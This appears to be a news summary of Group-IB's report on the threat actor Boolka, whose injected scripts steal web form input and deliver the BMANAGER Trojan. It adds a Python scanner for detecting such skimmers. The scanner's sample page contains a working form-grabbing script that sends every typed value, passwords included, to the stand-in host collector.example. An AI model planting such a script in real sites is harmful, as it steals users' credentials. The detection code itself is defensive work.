Group-IB has uncovered the activities of the threat actor known as Boolka, revealing their sophisticated malware operations and web attack strategies. Since 2022, Boolka has exploited vulnerabilities via SQL injection attacks, targeting websites across multiple countries. Their injected malicious scripts intercept user inputs, allowing the theft of sensitive data such as passwords and usernames.
In January 2024, Group-IB identified a landing page associated with Boolka’s operations that was used to distribute the BMANAGER modular Trojan. This Trojan is delivered through Boolka’s malware delivery platform, which employs the BeEF framework and a modified Django admin page. The malicious JavaScript deployed by Boolka captures user information and exfiltrates it to Boolka’s servers.
Boolka’s malware infrastructure has shown considerable evolution, with dynamic updates to their scripts to evade detection. By late 2023, Boolka’s payloads included new checks and functionalities, such as hidden web page elements. The BMANAGER Trojan, notable for its modular design, is used to perform various malicious activities including data exfiltration, keylogging, and file stealing.
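To illustrate what a defender can look for on a compromised site, the following is an added example (written for this summary, not Group-IB's or Boolka's code) that statically scans a page for the two symptoms described above: inline scripts that hook form input and send it to a host other than the site's own, and elements hidden with inline styles. The HTML sample, the `shop.example` site host and the `collector.example` receiver are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics: a listener on user-input events, a call that can send data out, and an absolute URL.
INPUT_HOOK = re.compile(r"addEventListener\(\s*['\"](?:input|keyup|keydown|keypress|change|submit)['\"]")
EXFIL_CALL = re.compile(r"\b(?:fetch|XMLHttpRequest|navigator\.sendBeacon|new\s+Image)\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")

class PageCollector(HTMLParser):
    """Collects inline <script> bodies and tags hidden via inline style."""
    def __init__(self):
        super().__init__()
        self.scripts, self.hidden, self._buf, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and "src" not in a:      # only inline scripts are of interest
            self._in_script, self._buf = True, []
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            self.hidden.append(tag)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

def scan_page(html, site_host):
    """Return (suspicious inline scripts, hidden tags) for a page served by site_host."""
    p = PageCollector()
    p.feed(html)
    findings = []
    for body in p.scripts:
        foreign = sorted({urlparse(u).hostname for u in URL_RE.findall(body)
                          if urlparse(u).hostname != site_host})
        # Flag only the combination: hooks input AND can send AND talks to a foreign host.
        if INPUT_HOOK.search(body) and EXFIL_CALL.search(body) and foreign:
            findings.append({"hosts": foreign, "snippet": body.strip()[:60]})
    return findings, p.hidden

# Constructed sample page: a benign external script, an injected form-grabber, and a hidden iframe.
SAMPLE_HTML = """<html><body>
<form id="login"><input name="user"><input name="pass" type="password"></form>
<script src="/static/app.js"></script>
<script>document.querySelectorAll('input').forEach(function(i){
  i.addEventListener('input', function(e){
    fetch('https://collector.example/c?d=' + encodeURIComponent(e.target.value)); }); });
</script>
<div style="display: none"><iframe src="https://collector.example/f"></iframe></div>
</body></html>"""

if __name__ == "__main__":
    print(scan_page(SAMPLE_HTML, "shop.example"))
```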
To defend against threats like the BMANAGER Trojan, organizations should maintain up-to-date systems, use advanced endpoint protection, monitor network traffic, and educate employees on safe browsing practices. Group-IB’s findings highlight the need for robust security measures in the face of increasingly sophisticated cyber threats.